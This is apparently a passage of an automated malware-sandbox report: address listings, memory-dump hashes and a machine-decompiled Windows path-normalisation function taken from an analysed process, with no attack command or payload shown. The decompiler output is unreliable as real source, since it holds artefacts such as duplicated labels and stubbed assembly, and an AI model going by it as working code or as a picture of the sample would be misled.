                                  0x1e3d25ef
                                  0x1e3d25ef
                                  0x1e3d25ef
                                  0x1e3d25f2
                                  0x1e3d25f8
                                  0x00000000
                                  0x00000000
                                  0x1e3d25fe
                                  0x00000000
                                  0x1e3d28e6
                                  0x1e3d28ec
                                  0x1e3d28ef
                                  0x1e3d28f5
                                  0x1e3d28f8
                                  0x1e3d28f8
                                  0x00000000
                                  0x1e3d28f8
                                  0x00000000
                                  0x00000000
                                  0x1e3d2866
                                  0x1e3d2866
                                  0x1e3d2876
                                  0x1e3d2879
                                  0x00000000
                                  0x00000000
                                  0x1e3d27e0
                                  0x1e3d27e7
                                  0x1e3d27e9
                                  0x1e3d27eb
                                  0x1e415afd
                                  0x00000000
                                  0x1e415afd
                                  0x00000000
                                  0x00000000
                                  0x1e3d2633
                                  0x1e3d2638
                                  0x1e3d263b
                                  0x1e3d263c
                                  0x1e3d263e
                                  0x1e3d2640
                                  0x1e3d2642
                                  0x1e3d2647
                                  0x1e3d2649
                                  0x1e3d264e
                                  0x1e3d2650
                                  0x1e3d2653
                                  0x1e3d2659
                                  0x1e3d26a2
                                  0x1e3d26a7
                                  0x1e3d26ac
                                  0x1e3d26b2
                                  0x1e415b11
                                  0x1e415b15
                                  0x1e415b17
                                  0x00000000
                                  0x1e3d26b8
                                  0x1e3d26b8
                                  0x1e3d26ba
                                  0x1e3d27a6
                                  0x1e3d27a6
                                  0x1e3d27a9
                                  0x1e3d27ab
                                  0x1e3d27b9
                                  0x1e3d27b9
                                  0x1e3d27be
                                  0x1e3d27c1
                                  0x1e3d27c3
                                  0x1e3d27c5
                                  0x1e3d27c7
                                  0x1e415c74
                                  0x1e415c79
                                  0x1e415c79
                                  0x1e3d27c7
                                  0x00000000
                                  0x1e3d26c0
                                  0x1e3d26c0
                                  0x1e3d26c3
                                  0x1e3d26c6
                                  0x1e3d26c6
                                  0x1e3d26c9
                                  0x1e3d26c9
                                  0x00000000
                                  0x1e3d26c9
                                  0x1e3d26ba
                                  0x1e3d265b
                                  0x1e3d265b
                                  0x1e3d265e
                                  0x1e3d2667
                                  0x1e3d266d
                                  0x1e3d2677
                                  0x1e3d267c
                                  0x1e3d267f
                                  0x1e3d2681
                                  0x1e415b49
                                  0x1e415b4e
                                  0x1e3d27cd
                                  0x1e3d27d0
                                  0x1e3d27d1
                                  0x1e3d27d2
                                  0x1e3d27d4
                                  0x1e3d27dd
                                  0x1e3d2687
                                  0x1e3d2687
                                  0x1e3d268a
                                  0x1e3d268b
                                  0x1e3d268e
                                  0x1e3d268f
                                  0x1e3d2691
                                  0x1e3d2696
                                  0x1e3d2698
                                  0x1e3d269d
                                  0x1e3d269f
                                  0x00000000
                                  0x1e3d269f
                                  0x1e3d2681
                                  0x00000000
                                  0x00000000
                                  0x1e3d2846
                                  0x00000000
                                  0x00000000
                                  0x1e3d2605
                                  0x1e3d260a
                                  0x1e3d260c
                                  0x1e3d2611
                                  0x1e3d2616
                                  0x1e3d2619
                                  0x1e3d2619
                                  0x1e3d261e
                                  0x00000000
                                  0x1e3d2624
                                  0x1e3d2627
                                  0x1e3d2627
                                  0x00000000
                                  0x00000000
                                  0x1e415b1f
                                  0x00000000
                                  0x00000000
                                  0x1e3d2894
                                  0x1e3d289b
                                  0x1e3d289d
                                  0x1e3d28a1
                                  0x1e415b2b
                                  0x1e415b2e
                                  0x1e415b2e
                                  0x1e3d28a7
                                  0x1e3d28a9
                                  0x1e415b04
                                  0x1e415b09
                                  0x1e415b09
                                  0x1e415b09
                                  0x00000000
                                  0x00000000
                                  0x1e415b35
                                  0x1e415b3c
                                  0x1e3d28fb
                                  0x1e3d28fb
                                  0x1e3d26cc
                                  0x1e3d26cc
                                  0x1e3d26d0
                                  0x00000000
                                  0x1e3d26d2
                                  0x1e3d26d2
                                  0x00000000
                                  0x1e3d26d2
                                  0x00000000
                                  0x00000000
                                  0x1e3d25fe
                                  0x1e3d292d
                                  0x1e3d292d
                                  0x1e3d2930
                                  0x1e3d2935
                                  0x1e3d2937
                                  0x1e3d293c
                                  0x1e3d293d
                                  0x1e3d293f
                                  0x1e3d2946
                                  0x1e3d294d
                                  0x1e3d294e
                                  0x1e3d2950
                                  0x1e3d2951
                                  0x1e3d2951
                                  0x1e3d2952
                                  0x1e3d2958
                                  0x1e3d295b
                                  0x1e3d2960
                                  0x1e3d2963
                                  0x1e3d2968
                                  0x1e3d2969
                                  0x1e3d296a
                                  0x1e3d2970
                                  0x1e3d2971
                                  0x1e3d2974
                                  0x1e3d2977
                                  0x1e3d297c
                                  0x1e3d297d
                                  0x1e3d297e
                                  0x1e3d297f
                                  0x1e3d2980
                                  0x1e3d2981
                                  0x1e3d2982
                                  0x1e3d2983
                                  0x1e3d2984
                                  0x1e3d2985
                                  0x1e3d2986
                                  0x1e3d2987
                                  0x1e3d2988
                                  0x1e3d2989
                                  0x1e3d298a
                                  0x1e3d298b
                                  0x1e3d298c
                                  0x1e3d298d
                                  0x1e3d298e
                                  0x1e3d298f
                                  0x1e3d2990
                                  0x1e3d2992
                                  0x1e3d2997
                                  0x1e3d29a3
                                  0x1e3d29a6
                                  0x1e3d29ab
                                  0x1e3d29ad
                                  0x1e3d29b0
                                  0x1e3d29b2
                                  0x1e415c80
                                  0x1e3d29b8
                                  0x1e3d29b8
                                  0x1e3d29bb
                                  0x1e3d29c0
                                  0x1e3d29c5
                                  0x1e3d29c6
                                  0x1e3d29c6
                                  0x1e3d29c9
                                  0x1e3d29cb
                                  0x00000000
                                  0x00000000
                                  0x1e3d29cd
                                  0x1e3d29d0
                                  0x1e3d29d9
                                  0x1e3d29db
                                  0x1e3d29dd
                                  0x1e3d2a7f
                                  0x1e3d2a84
                                  0x1e3d2a87
                                  0x1e3d2a89
                                  0x1e415ca1
                                  0x1e415ca3
                                  0x00000000
                                  0x1e3d2a8f
                                  0x1e3d2a8f
                                  0x00000000
                                  0x1e3d2a8f
                                  0x00000000
                                  0x1e3d29e3
                                  0x1e3d29e3
                                  0x1e3d29e3
                                  0x00000000
                                  0x1e3d29e3
                                  0x1e3d29dd
                                  0x00000000
                                  0x1e3d29db
                                  0x1e3d29e6
                                  0x1e3d29e9
                                  0x1e3d29eb
                                  0x1e3d29ed
                                  0x1e3d29f3
                                  0x1e3d29f5
                                  0x1e3d29f8
                                  0x1e3d29fa
                                  0x1e3d2a97
                                  0x1e3d2a9a
                                  0x1e3d2a9d
                                  0x1e3d2add
                                  0x00000000
                                  0x1e3d2a9f
                                  0x1e3d2aa2
                                  0x1e3d2aa5
                                  0x1e3d2aa8
                                  0x1e3d2aab
                                  0x1e415cab
                                  0x1e415caf
                                  0x1e415cc5
                                  0x1e415cda
                                  0x1e415cdc
                                  0x1e415cdf
                                  0x1e415ce5
                                  0x00000000
                                  0x1e415ceb
                                  0x1e415ced
                                  0x1e415cee
                                  0x00000000
                                  0x1e415cee
                                  0x1e415cb1
                                  0x1e415cb4
                                  0x1e415cb9
                                  0x1e415cbb
                                  0x00000000
                                  0x1e415cbd
                                  0x1e415cbd
                                  0x00000000
                                  0x1e415cbd
                                  0x1e415cbb
                                  0x1e3d2ab1
                                  0x1e3d2ab1
                                  0x1e3d2ac4
                                  0x1e3d2ac6
                                  0x1e3d2ac6
                                  0x00000000
                                  0x1e3d2ac6
                                  0x1e3d2aab
                                  0x00000000
                                  0x1e3d2a00
                                  0x1e3d2a09
                                  0x1e3d2a0e
                                  0x1e3d2a21
                                  0x1e3d2a24
                                  0x1e3d2a35
                                  0x1e3d2a3a
                                  0x1e3d2a3d
                                  0x1e3d2a42
                                  0x1e3d2a59
                                  0x1e3d2a59
                                  0x1e3d2a5c
                                  0x1e3d2a5f
                                  0x1e3d2a5f
                                  0x1e3d29fa
                                  0x1e3d29f3
                                  0x1e3d2a64
                                  0x1e3d2a64
                                  0x1e3d2a6b
                                  0x1e3d2a6b
                                  0x1e3d2a6d
                                  0x1e3d2a72
                                  0x1e3d2a72
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID: PATH
                                  • API String ID: 0-1036084923
                                  • Opcode ID: 1bdcb8070d9471ccf7fbae13a7332380e65c8477ac2325fc0249dfabc85de32d
                                  • Instruction ID: ca3ba7ddd2bbc8decde1601b7282267ecc70d950a386f2030515d9f234ffeaec
                                  • Opcode Fuzzy Hash: 1bdcb8070d9471ccf7fbae13a7332380e65c8477ac2325fc0249dfabc85de32d
                                  • Instruction Fuzzy Hash: 87C1A0B6D00319DBDB14CF99D880AADB7B5FF48B20F85461AE801BB250E775A945CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00088132, Relevance: .5, Instructions: 513COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e27f183078115b9e4f8fe20dd9ef32afe9fe95e7fab8d9d706de258247787a69
                                  • Instruction ID: 5625e342a342fde264604ef3762596a71ed9ec8187ac78f6cb7808236885ec77
                                  • Opcode Fuzzy Hash: e27f183078115b9e4f8fe20dd9ef32afe9fe95e7fab8d9d706de258247787a69
                                  • Instruction Fuzzy Hash: BEE1F472BA86404BC71CDE18DCC26B973DAE7CA309F59943DE4C7C7247DA29D5038A49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3C6E30, Relevance: .5, Instructions: 481COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E1E3C6E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x1e47fca8);
				_push(0x1e3f17f0);
				_push( *[fs:0x0]);
				_t312 =  *0x1e49d360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E1E3EFA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E1E3C74C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E1E3D9BC6( &_v52, 0x1e381080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E1E3E9377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E1E4246A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M1E3C749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E1E3A52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L1E3B2600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L1E3B2600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L1E424735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E1E3EBB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E1E3D2010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L1E424658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E1E3D9BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E1E3A52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L1E3A83AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E1E3A52A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L1E3A83AE(_t428);
														L80:
														E1E3D9BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x1e381080;
														_v72 =  *0x1e381080;
														__eax =  *0x1e381084;
														_v68 =  *0x1e381084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E1E3D9BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E1E3C746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E1E3EB640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

































































































                                  0x1e3c6e30
                                  0x1e3c6e35
                                  0x1e3c6e37
                                  0x1e3c6e3c
                                  0x1e3c6e47
                                  0x1e3c6e4b
                                  0x1e3c6e50
                                  0x1e3c6e53
                                  0x1e3c6e55
                                  0x1e3c6e5b
                                  0x1e3c6e5f
                                  0x1e3c6e65
                                  0x1e3c6e68
                                  0x1e3c6e6a
                                  0x1e3c6e6d
                                  0x1e3c6e70
                                  0x1e3c6e73
                                  0x1e3c6e76
                                  0x1e3c6e79
                                  0x1e3c6e7c
                                  0x1e3c6e7f
                                  0x1e3c6e84
                                  0x1e3c710f
                                  0x1e3c710f
                                  0x1e3c6e8c
                                  0x1e3c6e8e
                                  0x1e3c6e8e
                                  0x1e3c6e97
                                  0x1e40f5d3
                                  0x1e40f5d3
                                  0x1e3c6e9d
                                  0x1e3c6ea3
